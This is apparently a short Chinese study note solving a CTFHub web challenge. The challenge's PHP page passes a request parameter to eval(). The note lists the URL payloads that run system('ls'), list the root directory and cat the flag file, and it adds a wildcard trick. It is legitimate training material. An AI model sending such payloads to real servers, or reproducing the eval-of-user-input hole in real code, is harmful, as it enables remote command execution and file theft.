CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
自传.6 小时前
尚硅谷 Vibe Coding|第一章 AI 编程基础理论 学习笔记
笔记·学习·尚硅谷·vibe coding
吃好睡好便好7 小时前
改变时间轴的跨度
学习·生活
fox_lht7 小时前
15.3.改进我们之前的输入、输出项目
开发语言·后端·学习·rust
chase。8 小时前
【学习笔记】SimpleVLA-RL:通过强化学习扩展 VLA 训练
笔记·学习
C语言小火车8 小时前
什么时候用智能指针?什么时候用裸指针?
c语言·c++·学习·指针
AOwhisky9 小时前
Redis 学习笔记(第一期):概述、安装配置与核心理论
运维·数据库·redis·笔记·学习·云计算
AOwhisky9 小时前
Redis 学习笔记(第四期):高可用与集群(哨兵 + Cluster + 容器化)
linux·运维·数据库·redis·笔记·学习·缓存
skywalk81639 小时前
言知项目后续方向建议
开发语言·学习·编程
努力写A题的小菜鸡9 小时前
PyTorch 图像预处理 transforms 与 TensorBoard 可视化 (自己学习记录)
人工智能·pytorch·学习
一尘之中9 小时前
从概念到实践:软件架构核心知识梳理
学习·ai写作
热门推荐
01HTTP 与 HTTPS 的区别:从原理到实战详解02《置身钉内》原文-可播放阅读03【AI】2026 年具身智能模型和世界模型总结042026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?05GitHub 镜像站点062026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?07Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析08AI科技热点日报 | 2026年6月1日09AI一周事件 · 2026-06-03 至 2026-06-09102026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf